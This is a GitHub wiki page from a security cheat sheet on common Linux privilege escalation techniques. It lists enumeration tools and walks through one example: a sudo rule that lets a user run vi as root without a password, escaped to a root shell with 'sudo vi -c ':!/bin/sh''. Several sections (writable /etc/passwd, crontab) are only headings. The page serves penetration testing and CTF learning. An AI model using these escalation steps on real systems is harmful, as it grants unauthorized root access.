exploitation common linux privilege escalation - dvanmosselbeen/security-cheat-sheet GitHub Wiki

Common Linux Privilege Escalation List

A list of common Linux Privilege Escalation.

Table of Contents

Enumeration

Tools can help to find out misconfiguration vulnerabilities and ways for privilege escalation.

Tools to enumerate:

  • linpease - Linux Privilege Escalation Awesome Script
  • pspy - unprivileged Linux process snooping
  • LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks
  • LSE - Linux enumeration tools for pentesting and CTFs

SUID / GUID files

sudo

By running sudo -l we get to know what this user is allowed to do. In this example, user8 is allowed to run vi with root privileges. Assuming this has been set this way so that user8 could for example edit system config files. And the bad thing in this example, is that it also does not require user8 to enter a passwords.

user8@polobox:~$ sudo -l
Matching Defaults entries for user8 on polobox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user8 may run the following commands on polobox:
    (root) NOPASSWD: /usr/bin/vi

From this user8 can run vi, and then spawn a shell. There are multiples methods possible.

Directly by running the sudo vi command and spawning a shell:

user8@polobox:~$ sudo vi -c ':!/bin/sh'
# whoami
root

From within vi by running sudo vi.

And then in the vi(m) editor, type in: :!sh

See also the gtfobins website, dedicated vi page for more details: https://gtfobins.github.io/gtfobins/vi/

Exploiting writeable /etc/passwd

Exploiting Crontab

This consist in looking what crontab run in the hope to find some cron job / script that is run with root user. A script which we are allowed to edit, and thus do vertical privilege escalating.

Resources

Other: